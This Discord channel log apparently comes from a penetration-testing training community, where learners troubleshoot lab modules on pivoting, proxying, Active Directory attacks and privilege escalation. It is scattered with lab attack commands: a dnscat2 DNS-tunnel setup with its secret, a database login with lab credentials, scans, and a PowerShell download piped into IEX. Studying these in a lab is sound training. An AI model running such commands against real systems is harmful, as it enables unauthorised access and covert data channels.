#modules

1 messages · Page 383 of 1

cedar dagger
#

but not from the attack host

fallow kernel
#

Thats crazy im trying stuff for an hour now to connect to it but it doesn't want to connect

cedar dagger
#

try for the first pivot

#

from*

fallow kernel
#

The webserver?

cedar dagger
#

nono from the server u found the user:pass

#

for me it was working

fathom pendant
#

ahem spoilers: dm

zenith acorn
#

what?

fallow kernel
#

Aight ill try to reset I think since it doesn't work for me then

#

Thanks tony

fathom pendant
#

@zenith acorn keep to the topic

zenith acorn
#

sorry thought this was general'

lusty thicket
fathom pendant
#

No, this is Patrick

cedar dagger
zenith acorn
#

now im training an rrn on the maestro data set for 100 times

fathom pendant
zenith acorn
#

never seem to get it rght

#

need transformers

zenith acorn
#

haha

fathom pendant
#

Lay off the stuff man

zenith acorn
#

okay

honest crane
#

fwiw, ligolo-ng made this SA stupidly easier for me. Even though, I had some troubleshooting to do at the beginning related to the tool, once I switched back to an older version, I finished the whole lab in 30 minutes I think.

cedar dagger
#

Ok nice I see I'll try doing the whole lab again using only ligolo-ng to compare it

honest crane
#

I recommend using an older version; I used v0.5.2. If you get stuck with the tool, you can DM me

cedar dagger
fathom pendant
#

check the reading for "source ports"

#

you're overthinking the problem

#

netcat also requires a source port

#

the reading is clear

#

also you're using way too many flags there in your nmap command LOL

limber berry
#

-A would be a nice shorthand for that many flags methinks

rugged bolt
fathom pendant
#

again you're overcomplicating it

#

you only need to stick with what's shown by the module

#

(ncat is nmap's netcat module, you can install with sudo apt install ncat)

rugged bolt
#

I really appriciate your help, marcielee. was stuck on that for too long.

fathom pendant
#

stop spoiling commands

rugged bolt
#

Okay, sorry. wasn't sure if blacking it out was okay

fathom pendant
#

spoiler tags don't really do much as anyone can click them

rugged bolt
#

should I also reframe from posting commands in my original help message further up?

#

is there a list of rules for this channel? I checked in main rules but don't see anything specific. Just see the headline here not to spoil content over tier 0.

fathom pendant
rugged bolt
#

Okay, thank you and understood.

wooden perch
#

this Thick Client Attack module is missing lots of things to be considered close to 'ok'. Compiling process is confusing and codes that needs to be changed it's not well identified. At the end is also missing a note to inform that it's needed to delete the same method present. It's a huge waste of time

prisma tundra
#

Hey Guys for the SMB in footprinting module, I am trying to get the version(which I do) but it's not accepting the answer

#

this is the command to enumerate the SMB version

#

nmap <IP address> -sV -sC -A -p139,445

earnest pasture
prisma tundra
cloud urchin
earnest pasture
prisma tundra
prisma tundra
#

appreciate it guys I'll update you on it

open pecan
#

I want to start tackling htb labs. What courses should I take on the academy before I start?

cloud urchin
#

the cpts path would probably be best, but the academy paths are really designed to give you the knowledge and tools to take on the corresponding exams. it can certainly help you attack the lab machines, but the labs have a lot of variety and some things you just won't see in the paths.

open pecan
reef sonnet
#

hey guys can i ask here whether does the silver subscription open each module from 0 to 4 tiers?

alpine ingot
#

any community member on rn?

#

I need to talk to an admin or something, to report a bug i found in the machines

lusty thicket
alpine ingot
#

it allows me to connect to another users session on a completely different box

honest crane
#

In the "Password Spraying - Making a Target User List" section, it says:

"We've checked over 48,000 usernames in just over 12 seconds and discovered 50+ valid ones."

Is this a typo? Because I'm doing the exercise against the same target with the same userlist, and it has been 20 minutes and going.

storm elk
#

But you should only connect to the IP given to you

faint locust
#

How to buy ai red teaming course?

alpine ingot
storm elk
#

I have no idea how that’s possible. Might want to contact support about it

storm elk
storm elk
low girder
alpine ingot
storm elk
alpine ingot
#

whoops, wrong reply

low girder
#

Can I call you now on the Discord?

alpine ingot
#

yeahh

novel matrix
faint locust
autumn pilot
#

10 cubes for each module at the moment

modest lichen
#

i am finding trouble answering the Suricata questions in the 'working with IDS & IPS' Module ... " In the /home/htb-student directory of this section's target, there is a file called local.rules. Within this file, there is a rule with sid 2024217, which is associated with the MS17-010 exploit. Additionally, there is a PCAP file named eternalblue.pcap in the /home/htb-student/pcaps directory, which contains network traffic related to MS17-010. What is the minimum offset value that can be set to trigger an alert?" although the rule shows that the offset is 9 but it's incorrect, i tried to activate the rule and the check the fast.log file but nothing there.

autumn pilot
#

You need to keep trying different offsets

modest lichen
#

is there a range of offsets?

#

NVM i figure it out

next stone
#

Introduction to NoSQL Injection Skills Assessment II

#

Any here who can provide a hint on this one?

#

I can confirm that it's ||Server-Side JavaScript Injection|| but my payload doesn't seems to be working 😦

upbeat zinc
#

I just completed it... APPLICATIONS OF AI IN INFOSEC

dapper moth
next stone
#

@fickle thicket

#

I tried Blind Data Extraction with Server-Side Javascript Injection but it doesn't seems to work too

analog dock
#

Why are you looking for a username?

#

Do you not have a valid one yet?

next stone
#

Can i DM you?

storm elk
#

Please keep the spoilers to a minimum and take it to dm 🙂

still bolt
#

hi everybody module/211/section/2255 i need the some help to solve it
I don`t understand which type of filter needed

#

Navigate to http://[Target IP]:5601, click on the side navigation toggle, and click on "Dashboard". Browse the refined visualization we created or the "Failed logon attempts [All users]" visualization, if it is available, and enter the number of logins for the sql-svc1 account as your answer.

urban elk
#

In Attacking Common Applications, section Attacking CGI applications - Shellshock: any idea why the curl call to verify the vulnerability includes bash -s :'' ? After researching I know what it does (or can do), but it doesn't really seem to do anything here

grizzled schooner
#

even after a full restart of the machine, all of the options get configured, and when ran I get:

" Exploit failed: NoMethodError undefined method `split' for nil:NilClass
[*] Exploit completed, but no session was created."

#

What am I missing? lol please @ with response

quasi moth
#

Hi, I am doing Windows PrivEsc module, SeImpersonate section, I am trying ot use msssqlclient from impacket to log in as sql_dev, but the output I have is:
||```bash
┌──(venator17㉿venator)-[~/Downloads]
└─$ impacket-mssqlclient slq_dev:'Str0ng_P@ssw0rd!'@13.13.13.13 -windows-auth
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies

[*] Encryption required, switching to TLS
[-] ERROR(WINLPE-SRV01\SQLEXPRESS01): Line 1: Login failed. The login is from an untrusted domain and cannot be used with Windows authentication.

hasty mauve
solid quarry
gray yacht
#

slq_dev should be sql_dev

quasi moth
urban elk
#

<@&861185840277487616>

#

this is not hack for hire and the hacker you're hiring is probably scamming you

dark hedge
#

NO, this is not hacker for hire, and this is illegal

stray compass
#

I am trying to use proxychain to proxy curl commands through Burp. I am doing this as part of the Using Web Proxies module. It doesn't seem to proxy my requests though.

I've modified the proxychains configuration file as directed (/home/user/.proxychains/proxychains.conf) with the line http 127.0.0.1 8080. The request goes through, but it is not being proxied through Burp. Yes, Burp is set up to intercept port 8080. Anyone run into this issue before?

Here is the attempt and response:

usr@nixos:~/ > proxychains4 curl http://google.com    
[proxychains] config file found: /home/usr/.proxychains/proxychains.conf
[proxychains] preloading /nix/store/3rm2axf2sdjx4fnlwxpr3cm2hvhrhrh3-proxychains-4.4.0/lib/libproxychains4.so
[proxychains] DLL init
<HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8">
<TITLE>301 Moved</TITLE></HEAD><BODY>
<H1>301 Moved</H1>
The document has moved
<A HREF="http://www.google.com/">here</A>.
</BODY></HTML>
spring trellis
#

Hi, I am doing the Privileged Access Module in the active directory section

#

Kind of having issues understand the raw queries for BH

#

also is writing queries for BH that common ?

#

BH = Bloodhound !

hard matrix
#

does your conf look any different from mine? seems to work on my box

stray compass
#

Yeah it does look different, I don't have the [ProxyList] line, I'll try that now, thanks

hard matrix
#

cp /etc/proxychains.conf ~/.proxychains/proxychains.conf

#

if you want to take the preinstalled conf file and make your own conf out of it

stray compass
#

It didn't work unfortunately. I don't seem to have the file /etc/proxychains.conf. I am using nixos, maybe it doesn't add that file

#

http_proxy=localhost:8080 htts_proxy=localhost:8080 curl https://google.com worked, so I think it is a proxychains configuration issue. I'll keep poking around

#

I've been meaning to try Arch, maybe I'll switch over

pseudo kiln
hard matrix
#

but obviously trust your preferences

stray compass
#

I'll try uncommenting to see if it changes things

hard matrix
#

why? Not sure! there's probably a good reason

pseudo kiln
#

with chisel for example you need socks5 as that is what it does by default, with burp idk is it socks4 or socks5 proxy ?

stray compass
#

No, that didn't work. Here is my current config:

strict_chain
#proxy_dns
#remote_dns_subnet 224
tcp_read_time_out 15000
tcp_connect_time_out 8000

localnet 127.0.0.1/255.0.0.0

[ProxyList]
#http 162.243.184.252 8585
http 127.0.0.1 8080
#socks4 184.170.245.148 4145
#raw 162.243.184.252 8585

#

I'll try socks5 next

pseudo kiln
#

well worth a shot

stray compass
#

No that also did not work. The request goes through but doesn't proxy through Burp like all the others

#

Google is not very helpful in this regard lol

hard matrix
#

the only lines I have uncommented in my conf file are below:

strict_chain
tcp_read_time_out 15000
tcp_connect_time_out 8000
proxy_dns

[ProxyList]
socks5  127.0.0.1 8080
pseudo kiln
#

does it only impact curl or other tools too ?

hard matrix
#

prob change socks5 -> http

stray compass
#

Oh, ok I'll try that

half sparrow
#

I'm so confused. I'm doing this question: Determine what user the ProFTPd server is running under. Submit the username as the answer.

I did:

input: sudo ps aux | grep proftbd

output: ||htb-ac-+ 197419 0.0 0.0 6332 2304 pts/0 S+ 09:12 0:00 grep --color=auto proftbd||

How is ||htb-ac-+|| not the correct answer?

ocean night
#

Read your input back carefully Valle

urban elk
#

the output is also a clue :)

stray compass
ocean night
#

Stupid comment, but did you restart the service?

stray compass
pseudo kiln
#

can you try to use it with curl's native proxy option ?

kali@kali:~/Downloads/Dante/172.16.1.5 [30-01-2025 17:21]$ curl --help all | grep -ie 'proxy'
     --haproxy-clientip <ip>                       Set address in HAProxy PROXY
     --haproxy-protocol                            Send HAProxy PROXY protocol v1 header
     --noproxy <no-proxy-list>                     List of hosts which do not use proxy
     --preproxy [protocol://]host[:port]           Use this proxy first
 -x, --proxy [protocol://]host[:port]              Use this proxy
analog dock
pseudo kiln
#

like setting it with -x, instead of using proxychains

stray compass
ocean night
#

😅

edgy crown
#

Hell Na

#

‘Mm

stray compass
ocean night
#

Ah, cool.

pseudo kiln
#

ah ok, well at least we know it's isolated to something with proxychains

#

and not the burp proxy itself

half sparrow
ocean night
#

Oh nvm, proxychains

#

No service to restart in that use case

stray compass
hard matrix
# analog dock Ew root shell

i abuse my kali installation and nuke it frequently + restore from snapshot
anything i actually need is stored my host os 🤓

#

gave up on trying to make it stable

half sparrow
analog dock
urban elk
pseudo kiln
# urban elk what's the new output ?

I just tested it on my machine and it works
my config

kali@kali:~/Downloads/Dante/172.16.1.5 [30-01-2025 17:27]$ cat /etc/proxychains4.conf| grep -v '#'
strict_chain
Quiet mode (no output from library)
proxy_dns
remote_dns_subnet 224
tcp_read_time_out 15000
tcp_connect_time_out 8000
[ProxyList]
http 127.0.0.1 8080

my command

kali@kali:~/Downloads/Dante/172.16.1.5 [30-01-2025 17:27]$ proxychains curl -i http://example.com
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.17
[proxychains] Strict chain  ...  127.0.0.1:8080  ...  example.com:80  ...  OK
HTTP/1.1 200 OK

and I see it in burp

hard matrix
# analog dock Idk why people have so much issues with their kali

dude, no clue. maybe its how it interacts with different vm software but i have encountered a litany of issues. most recently if I try to open burp + firefox too fast it will literally lock up and reboot itself
my most recent nuke of my installation some env variables / window manager configs / ???? got jumbled and i could no longer switch between workspaces or resize windows

hard matrix
#

literal black magic sorcery

analog dock
#

How do u upgrade your stuff?

hard matrix
#

and instead of spending 500 years debugging the issue i just figure
lets just preload all the tools i usually use
make a snapshot
restore when things inevitably go haywire

urban elk
#

which virtualisation soft ?

hard matrix
#

i use vmware workstation prof

urban elk
#

same, huh

stray compass
hard matrix
stray compass
#

I give up everyone, I'm just going to switch my OS to something else, I'm tired of dealing with nixos issues and it seems that proxychains works for everyone else. Maybe kali, but more likely Manjaro or just go full Arch

hard matrix
#

plz god dont use manjaro for pentesting

stray compass
#

Why not?

hard matrix
#

its not a pentest os

analog dock
hard matrix
#

unless you really know what you're doing just use the standard OSes everyone uses no need to reinvent the wheel

#

unless you have a very specific reason for using arch and downloading black arch mirrors for packages you're just asking for more issues than you bargained for

#

there's a reason theres like 2-3 oses everyone uses for pentesting - it just works (TM)

stray compass
#

Lol, ok cool. Yeah I'll seriously consider Parrot and Linux in that case, thanks for the advice

#

*Kali

opaque tree
#

guys whats the best vm?

analog dock
#

The one you’re most comfortable with

narrow meadow
#

hello, can anyone give a help in Footprinting lab -easy?

analog dock
#

Ask your question

storm elk
analog dock
lusty thicket
#

just ask

rare marsh
#

hi

#

sorry for my english,

#

i have a question.

i'm traying resolve this module; Attacking common applications - skills assessment I, but i found the vuln at tomcat cgi more specifig in 9.0.0.M1, i also found the exploit at github but this is not working
CVE-2019-0232.py

shut vapor
fathom pendant
#

I suggest taking to dms

#

So as to not spoil

shut vapor
#

Good idea, my DMs are open

worn matrix
#

Who can give me notes or a site or a video,which explains in depth deseralization gadget chains ?

rare marsh
#

sorry i can't

fathom pendant
#

You need to link your account via #welcome instructions

#

But as I said

shut vapor
fathom pendant
#

spoilers

#

So take to dms

dreamy juniper
#

Has anyone done the Footprinting Medium lab? I'm getting an error when trying to connect to the database, as it looks like the database isn't availble

fathom pendant
#

You can't connect externally

dreamy juniper
#

Yeah, sorry.. I've connected via RDP, and I have the SA creds but i get a "no process on teh end of the pipe" when trying to connect

fathom pendant
#

Maybe the creds are reused

#

😉

#

I suggest restarting the lab if you're 100% sure

dreamy juniper
#

ah... the penny drops! Thanks for the hint... connected now!

late moth
#

in The windows privilege escalation module the Hyper-V administrators section isn't making sense to me. Anyone willing to break it down for me, and help me understand better? My attempts to google it more and using AI didnt help

safe star
#

That’s what I understand yeah from module at least

late moth
safe star
late moth
#

Gotcha

#

Ty

eternal gust
#

I have some trouble with this module's answer, Introduction to Malware Analysis

Dynamic Analysis
Use Noriben to perform dynamic analysis on shell.exe. Enter the IP address shell.exe pings as your answer.

safe star
fathom pendant
#

Did you use noriben to dynamically analyze shell.exe Kappa

eternal gust
#

yes I did use Noriben

#

I dont see where is the ping

#

I will checked with tcpview

gaunt forge
#

I've been really struggling with dns tunneling with dnscat2 on the pivoting, tunneling, and port forward module. I keep on running into a powershell error saying that the server failed to negotiate encryption. this should be a really simple module, theres not many commands to enter. could anyone help please?

supple scaffold
gaunt forge
#

I tried on the pwnbox too and I get the same issue, in theory all I should have to do is change the ip address for the commands and change the preshared key but I did that and it's not working

#

i also tried running powershell as admin and that did nothing

#

should i run it with or without systemd-resolved?

shut vapor
#

is strace the procmon of linux?

violet prawn
gaunt forge
#

wait where does it show you how many people earned it?

cloud urchin
frigid bay
gaunt forge
#

yes, for sure. Im switching vpn servers now and retrying again

frigid bay
#

I retrieved the flag from DNS Tunneling with Dnscat2. However I don't know how to get the Domain inlanefreight.local. Where does inlanefreight.local. come from? How can we get it from the command line?

gaunt forge
#

I have zero idea, we might be able to write anything there and it will connect over it? not to sure

#

i keep on getting this error tho:

lusty thicket
gaunt forge
#

it should be, i started it with: sudo ruby dnscat2.rb --dns host=10.10.15.182,port=53,domain=inlanefreight.local --no-cache
and the secret is ba11be266538acf32465c976e4dc9c3e

lusty thicket
gaunt forge
#

whats super weird is that i get the same error if i run it pointing to an ip that isnt even mine, even though ping resolves just fine

frigid bay
gaunt forge
#

thanks guys running it rn but the vpn dropped my connection and need to rdp again

lusty thicket
#

systemd-resolve could also prevent dnscat from binding

gaunt forge
#

i had systemd-resolved disabled before and it still didn't work

#

i have it enabled now

#

im so confused

lusty thicket
#

sorry test connection defaults to udp iirc

#

and dnscat uses udp

#

so just verify its listening on the server

#

or force a udp test from the client

frigid bay
#

By any chance does anyone know where the domain inlanefreight.local come from in the DNS Tunneling with Dnscat2 module? How can we retrieve it from the command line?

gaunt forge
fathom pendant
gaunt forge
#

i might just skip it at this point, ive been at it for 3 hours now

#

I'm not to sure where I would really need it anyways, if i can already talk to the host why would i set up dnscat2?

fathom pendant
#

Also: I'm pretty sure the preshared secret bit is for passwords, not a fingerprint as that appears to be

gaunt forge
#

well yes its for pivoting, but i really don't see the point if you already need full admin access to a computer to setup the tunnel. apart from secure data stealing, idk maybe im just missing something

#

but at that point an upload server is better

#

with a cert

unreal aspen
#

Hi guys, I have a little interpretation problem that I need some guidance on. Within the Getting started module is the escalation section, and within that is the SSH keygen. although I somehow got it there and done but I wanted to deepen this knowledge so now within metasploitable I should do the same, I already have the RSA_id, I have an authorized_key, and a DSA_key. I just copied them out (CTRL+SHIFT+C) and saved them on my computer in nano. I thought maybe the problem is that I don't have a .pub file. Could this be the error? Chmod of course I have it. maybe this keygen -f would be the solution, could someone understand this with me, here or privately. P.S.: An enthusiastic beginner

lusty thicket
#

this is strange

gaunt forge
#

i mean i've been able to get this far so far just fine like this

gaunt forge
#

i think my firewall may have been stopping this from working

#

just did this hopefully it gets it to work now

fathom pendant
unreal aspen
#

😄

lusty thicket
fathom pendant
#

Honestly I switched to ligolo-ng after this module, and never looked back

gaunt forge
gaunt forge
#

oh

fathom pendant
#

It allows you to explore other machines where there may be stored credentials to further elevate privileges beyond a local admin.
A powerful acl is ForcePasswordChange, because that doesn't require you to know the subject's password, just create a new password object and pass that with cred to change password

gaunt forge
gaunt forge
#

its not even working on my local machine

fathom pendant
#

Thats all

gaunt forge
#

yeah im so confused

#

i ran it like this on my local ip: sudo ruby dnscat2.rb --dns host=192.168.50.110,port=53,domain=inlanefreight.local --no-cache

#

then i ssh'd to another computer and ran this to try to see if i could see if its up and working:``` msiubuntu@msiubuntu:~$ nmap -p 53 192.168.50.110
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-01-30 15:45 PST
Nmap scan report for 192.168.50.110
Host is up (0.0038s latency).

PORT STATE SERVICE
53/tcp closed domain

Nmap done: 1 IP address (1 host up) scanned in 0.03 seconds```

#

but if im on my own pc and i run this to see if theres open ports it says theyre open : sudo ss -tuln | grep ':53' udp UNCONN 0 0 192.168.50.110:53 0.0.0.0:*

fathom pendant
gaunt forge
#

wait no that was really dumb

#

ok it says its open when i run a udp scan

gaunt forge
fathom pendant
#

Also wrap code/output in ``` before and after

gaunt forge
#

ok will do mb

fathom pendant
#

```
Like this
```

Looks like this
#

Formats it in a neater way and makes line breaks easier to notice

#

Alongside monospaced font

#

And you can't mistake an O for an 0, O 0

gaunt forge
#

this lab is so frusterating to me now, i can connect just fine with my other machine locally with ```./dnscat --dns server=192.168.50.110,domain=inlanefreight.local

#

and that creates a shell just fine

#

i just can't do it with the powershell command

fathom pendant
#

I smell a bot

gaunt forge
#

im on the module right now, i think it has pretty clear commands. i also went to medium and found and article there using the exact same commands im using and i couldn't get it to work following thos, thanks tho.

#

thank you i finaly got it to work though!

#

no idea what i changed

fathom pendant
gaunt forge
#

i think i just needed to enable tcp over port 53 on my firewall and then reboot my computer

fathom pendant
gaunt forge
#

oh huh i didn't know that

gaunt forge
#

are the medium modules tier 2?

fathom pendant
#

Not all, and not all fundamental modules are tier 0

#

Price: 10, 50, 100, 500, 1000
Tier: 0, 1, 2, 3, 4

gaunt forge
#

ohh ok gotcha

#

@lusty thicket @frigid bay thanks for the help again!

gaunt forge
#

whats the point of botting to offer help?

fathom pendant
gaunt forge
#

interesting, this is kinda a bold place to run discord scams

gaunt forge
#

is there anything you guys do to stop the vpn from dropping your connection every 5 minutes or so?

cloud urchin
gaunt forge
#

oh yeah its on but i'm not using it

#

just terminated hopefully ssh connections will stop dropping

cloud urchin
gaunt forge
#

alright thanks!

#

somehow im 41% of the way through the course and still missing things like this lol

#

but hey at least i can type HTB_@cademy_stdnt! really fast now

fathom pendant
#

just copy/paste

#

¯_(ツ)_/¯

#

no need to type it if you copy/paste it

gaunt forge
#

nooo but i want to save my clipboard for longer messages

naive cedar
#

.

fathom pendant
gaunt forge
#

fedora does that too lol i probably should just copy and paste its prob quicker

long kestrel
#

my first time getting this msg trying to spawn a pwnbox

#

I was just gonna use the HTB version of ParrotOS in a VM but it wouldn't boot if I enabled LUKS encryption, and the package manager seemed to have misconfiguration issues by default where I couldn't update it until I changed the entries for its source list, but then it still had some public key issue so I just went back to using the pwnbox.

#

maybe ill try again with normal parrotOS instead of following the "setting up" module

cloud urchin
#

i'm pretty sure the only difference is the theme

long kestrel
#

I figured it would have different tools installed by default

cloud urchin
#

i don't think so (i could be wrong)

light breach
#

Hey there, I have come back to HTB to continue the nibbles - privilege escalation module, do I have to redo the older nibbles modules like initial foothold before I continue? The reason is my labs are not working as expected.

cloud urchin
#

each module and section are standalone instances, you don't need to do previous sections to access/complete later sections

#

sometimes modules will use the same target for several sections, i forget but for those you may need to perform the previous steps to gain privileges back that you may have obtained on a previous section

light breach
#

Thanks for the quick reply SuperNuts

fathom pendant
light breach
#

Ok looks like i will have to redo …going by the commentary in the module …thanks.

mint nacelle
fathom pendant
light breach
#

The module starts off with “ Now that we have reverse shell…”

fathom pendant
light breach
#

I reckon there should be some persistence in state so we don’t have to redo the modules again …especially for time poor students like us who manage work, family and study 🫤

mint nacelle
#

You should be able to get access from your dashboard menu mate!

fathom pendant
fathom pendant
cinder warren
#

linux fundamentals, regex expressions. I am supposed to be grepping for Authentication as the end of the line, what am I missing in my command? I have looked and can't find anything online.

#

Maybe I did it right after reading the line again.

#

I tend to overthink sometimes

fathom pendant
white dock
#

Hi

waxen totem
#

@fathom pendant I can finally say I've done the fundamentals! not before getting ProHacker rank though kek
https://academy.hackthebox.com/achievement/1306612/path/120

tough flame
#

I'm going through the Pen tester module and I've reached the Nmap section. I'm told in the exercise to use the IP address 10.129.42.253 to run nmap with, but the host seems to be down. It keeps saying destination host unreachable when I try to ping it. Is this a known issue?

fathom pendant
#

The ip you'd scan is the one given when you <click here to spawn target>

tough flame
#

I am connected to the VPN and I just found the spawn target button.....

#

Thanks for the help, it should work now

tough flame
#

Sorry, new to HTB

honest crane
#

I'm going through the AD Attacks module, Kerberoasting from Windows section. I extracted tickets from the memory using mimikatz and they're saved as .kirbi files. I'm wondering, is it possible to transfer them, convert to .ccache and do PTT attack?

honest crane
#

Yeah, I'm aware. But using the .ccache to authenticate didn't work. Also, I feel like I'm missing something here, because it doesn't make sense to do PTT via Kerberoasting.

urban elk
#

it's described in the PTT from Linux section of Password Attacks

honest crane
#

Oh, I'm supposed to have TGT, not TGS for PTT, I think.

oak girder
#

hello

#

I have a question. How can I tell if bloodhound and SharpHound are collecting the same version?

honest crane
frigid bay
hasty mauve
#

though I miss legacy because it had ready to use queries lol.

honest crane
oak girder
#

I found this at pwn.

honest crane
safe star
oak girder
#

ok thanks guys, I'm about to try it now!

autumn pilot
#

In the legacy bloodhound UI you can click the i icon to bring up the version

#

additionally, running SharpHound also tells you with which version of bloodhound is compatible

oak girder
empty trout
#

can i get a hint Examine the second target and submit the contents of flag.txt in /root/ as the answer. its from password attacks practise lab medium . i found the document containing password of a user then found mysql instance and found more creds of another user i dont find any file containing root creds

empty trout
#

???

oak girder
#

? What are you inquiring about?

empty trout
#

doing lab and stuck

#

module = password attacks . section practise lab medium

empty trout
#

yeah i switched to the user dennis and found his private key

#

but i need root

safe star
#

just because its in there doesnt mean its his

empty trout
#

yeah i checked i cannot ssh into root with that private key

safe star
#

why not?

empty trout
#

root@10.129.202.221: Permission denied (publickey).

safe star
#

ok?

#

it wants a private key

empty trout
#

yeah i public are not encrypted

#

it was encrypted

safe star
#

then get the keys password

empty trout
#

so just think its private key and pubilc key have .pub in ext

safe star
#

wym?

#

dm your commands

fathom pendant
#

id_rsa is the private key

empty trout
#

i did grab the private key

#

the problem is the private key is encrypted and even using that key there is no pasphrase prompt to unlock that key and use it .

fathom pendant
#

It's not encrypted the word you're looking for is password protected

#

And there is a tool to extract the password hash, John is a friend here maybe you should look 2 him

empty trout
#

i think htb used the word encrypted in the module

#

any way

#

??

fathom pendant
fathom pendant
#

If pubkey auth fails, it tries to fall back to pw auth

#

And if that's disabled then you get the message you're getting

empty trout
#

Yeah then i just aimlessly finding the creds for root and its been 2 hours

#

I found overlayroot which contain the password foobar

bright ridge
#

regret paying for the ejpt, htb acadamy is way better

empty trout
#

But its out of module so i think it is not the way

bright ridge
#

and the exam was a joke

#

very easy

empty trout
#

I found a distraction

empty trout
fathom pendant
#

A user you have access to has the key

safe star
#

Ine course is unnecessarily long with barely any web and no AD

empty trout
fathom pendant
empty trout
#

ohh i forgot sorry for that

grizzled schooner
#

||ms17_010|| exploit keeps failing for shells and payloads skill assessment?

#

Specifically using ||exploit(windows/smb/ms17_010_eternalblue)|| was going to try and just get a .py script to run instead but firefox wasn't getting anything on the internet and would time out

#

yeah I'm lost on this, I've reset a couple of times too

#

anyone got any help for this? please @ with response

#

^^^ Using ||psexec|| over the other one I mentioned works better disregard help

woeful lake
#

Hi guys, im working with bloodhound and i have to finde the name of a computer, but instead bloodhound give me the id obtject of it, i have to run again sharphound? or i missing somesing

woeful lake
#

With Get-ObjectAcl?

#

Im kind of new in powershell/powerview queryes

bright ridge
#

cypher queries

#

message me if you can’t figure it out

#

but research first

bright ridge
empty trout
#

it worked but this time i tried to encode decode the key to transfer it and then use it . and it worked that way but earlier i also did checked the md5 hash of both of the key . they are same so come this happend

woeful lake
cosmic tide
#

Regarding PetitPotam, is it possible to perform an attack without ADCS service?

rustic sage
#

The Injection Attack Skills Assessment was difficult, but the overall module was amazing

if anyone would like to talk about it (even in dm) i would appreciate 😄

edgy ember
#

In the RBCD from linux module, in the RBCD from Linux When MachineAccountQuota Is Set to 0 section. I understand why the password change is necessary but, should't we also require the user's SID to be added to the msDS-AllowedToActOnBehalfOfOtherIdentity attribute? I didn't really understand why we are able to impersonate the Administrator when we are not actively modifying this attribute... Can anyone explain please?

near wraith
#

I am new to HTB Academy (and Cybersecurity), should I start with the CBBH path or is there a beginner module that I should do?

compact patrolBOT
near wraith
#

Thanks!

wild sage
#

Are you trying to do Web pen testing or Network Pen testing?

#

CBBH is more web testing, CPTS is more network testing but has web app testing included

still edge
#

Hello guys i'm trying to download a file from powershell i tried a few command but still get the same error message

Invoke-WebRequest : The server committed a protocol violation. Section=ResponseStatusLine
At line:1 char:1

  • Invoke-WebRequest http://10.X.X.X:80/Downloads/0.pcap | IEX
  •   + CategoryInfo          : InvalidOperation: (System.Net.HttpWebRequest:HttpWebRequest) [Invoke-WebRequest], WebExc
     eption
      + FullyQualifiedErrorId : WebCmdletWebResponseException,Microsoft.PowerShell.Commands.InvokeWebRequestCommand
azure nacelle
#

Hello

near wraith
#

CBBH is the first path so maybe I'll just stick to that first

bright ridge
prisma thistle
bright ridge
#

try to use -UseBasicParsing

acoustic owl
acoustic owl
prisma thistle
prisma thistle
bright ridge
#

you will see it

#

just wait for it to spin up

prisma thistle
#

@bright ridge

#

I answered the question, I want to turn off the machine

acoustic owl
prisma thistle
#

It turns off automatically, no problem anyway

prisma thistle
#

okey

bright ridge
#

oh its the intro to acdamy

#

my bad

prisma thistle
thorn wedge
#

hello guys, how are you here, just curious i would like to ask some questions concerning cybersecurity

lament sluice
#

Hello, I have a question about DRM, where can I ask it?

thorn wedge
acoustic owl
oak girder
#

Hi can someone tell me about this module and if it's worth unlocking?

vast veldt
#

Hi, I am quite at the beginning of my journey - moving through the "Nibbles" walkthrough (Module 77: Nibbles - Initial Foothold)
I am able to scan/ping the target visit the website behind port 80, but gobuster is not able to connect and when I insert my admin credentials on the admin page (which are supposed to work), i do not get an answer (neither success nor failure - just endless sweeping). I've also restarted the target. Any ideas?

fathom pendant
#

No

#

It's part of the getting started module goober

storm elk
#

🤦

safe star
storm elk
#

Oh wait

#

It is

fathom pendant
storm elk
#

🤯

fathom pendant
storm elk
#

You’re right

still edge
safe star
#

have you opened the server to see what it looks like

surreal hedge
safe star
#

i meant open it in a browser

#

is it the same?

surreal hedge
#

If its work do urlcache or wget

vast veldt
still edge
safe star
#

missing http?

#

try urlcache too

still edge
#

what is urlcache ?

surreal hedge
#

Do this

still edge
#

blocked by AV

#

i'm not admin on the host

#

im in the file transfer module

#

with the host ms02

fathom pendant
#

taps the sign

#

File upload attacks is not t0

eternal gust
#

Hello, at the moment I am in the module Windows Attacks & Defences Overview and Lab Environment, as part of the SOC ANALYST path, and now I don't know how to connect RDP with virtual WINDOWS in order to share a file for analysys.
Can you refer to me a link or give an advice

rugged bolt
safe star
#

Just copy and paste if that’s the case

eternal gust
#

yes

limber berry
ocean night
limber berry
#

ohh my mistake

#

know where I can ask for help? I did check out writeups but I want to know why my specific extension isn't working

#

most likely because of the / in the extension

limber berry
#

understood

fathom pendant
#

You can ask for help here, just avoid giving specifics, like payloads, or screenshots

#

You shouldn't need to go beyond what the section shows you

deep shore
#

Currently working login bruteforcing skills assessment part 1... Provided username and password list has worked for folks on the forum, but I'm not turning up results. Any pointers? Reset instance several times. It's just basic HTTP auth... Hydra syntax isn't even complex. Wordlists are correct, and obtained from their links even though I already have seclists locally JUST TO BE SURE.... Really struggling to wrap my head around what I'm doing wrong with this one. Going to try mutating a wordlist after this, but that'll raise times to ungodly proportions so figured I would ask before I shot myself in the foot for no reason lol. Thanks in advance.

hexed oyster
#

that moment when you find the other vulnerability

winged knoll
#

I started a penetration testing job role on Hack The Box (HTB) three days ago, and today I was working on the public exploits chapter. I spent two hours on it, but I still couldn’t capture the flag. The main issue is that I struggle with reading, so I would give ChatGPT all the reading material and ask it to summarize it for me. Today, when I used Nmap to check the target's service, I found that it had a UDP port and was running Apache 2.4.41. I searched for public exploits for Apache 2.4.41 but couldn’t find any, not even in Metasploit or any other database. After refreshing the target and trying again, I faced a session issue (the issue was no session establishes) . Even after asking ChatGPT for help, I couldn’t find a solution. It was frustrating when I provided a list of Apache exploits from Metasploit and asked for the specific exploit I could use to compromise the machine, but the responses were completely unhelpful. Despite trying to explain, ChatGPT just kept giving the same responses, which left me feeling stuck. I eventually turned off my laptop. I’m also taking notes, but I’m not satisfied with my progress and don’t feel like I’m fully benefiting from the course. I don’t feel like I’m truly learning from it.

#

Can someone help me out with some advice.

cloud urchin
#

best to say what module/section/question you're stuck on

winged knoll
#

Module: getting started
Section: public exploits
